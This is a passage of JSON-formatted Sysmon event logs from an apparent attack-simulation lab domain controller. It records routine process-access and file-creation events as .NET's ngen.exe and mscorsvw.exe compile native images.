07:03:02.357","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1378-5F25-0000-0010214C0F00}","TargetProcessId":"3296","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8933,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:02.357\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1378-5F25-0000-0010214C0F00}\r\nTargetProcessId: 3296\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:02.357","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1378-5F25-0000-0010214C0F00}","TargetProcessId":"3296","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8934,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:02.357\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1378-5F25-0000-0010214C0F00}\r\nTargetProcessId: 3296\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:02.357","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1378-5F25-0000-0010214C0F00}","TargetProcessId":"3296","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8935,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:02.404\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13A6-5F25-0000-0010A3E51000}\r\nTargetProcessId: 4812\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:02.404","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13A6-5F25-0000-0010A3E51000}","TargetProcessId":"4812","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8936,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:02.404\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13A6-5F25-0000-0010A3E51000}\r\nTargetProcessId: 4812\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:02.404","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13A6-5F25-0000-0010A3E51000}","TargetProcessId":"4812","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8937,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:02.404\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13A6-5F25-0000-0010A3E51000}\r\nTargetProcessId: 4812\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:02.404","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13A6-5F25-0000-0010A3E51000}","TargetProcessId":"4812","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8938,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:03:02.498\r\nProcessGuid: {E2A3D6B1-13A6-5F25-0000-0010A3E51000}\r\nProcessId: 4812\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12cc-0\\UIAutomationProvider.dll\r\nCreationUtcTime: 2020-08-01 07:03:02.498","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:03:02.498","ProcessGuid":"{E2A3D6B1-13A6-5F25-0000-0010A3E51000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12cc-0\\UIAutomationProvider.dll","CreationUtcTime":"2020-08-01 07:03:02.498","EventReceivedTime":"2020-08-01 07:03:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8939,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:02.529\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13A6-5F25-0000-001069E91000}\r\nTargetProcessId: 3960\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:02.529","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13A6-5F25-0000-001069E91000}","TargetProcessId":"3960","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8940,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:02.529\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13A6-5F25-0000-001069E91000}\r\nTargetProcessId: 3960\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:02.529","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13A6-5F25-0000-001069E91000}","TargetProcessId":"3960","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8941,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:02.529\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13A6-5F25-0000-001069E91000}\r\nTargetProcessId: 3960\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 